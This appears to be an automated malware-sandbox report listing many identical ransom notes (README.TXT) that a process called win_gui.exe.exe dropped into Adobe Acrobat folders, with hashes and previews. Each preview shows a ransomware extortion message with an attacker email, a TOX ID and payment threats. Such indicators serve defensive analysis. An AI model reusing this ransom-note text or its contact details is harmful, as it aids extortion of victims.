                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
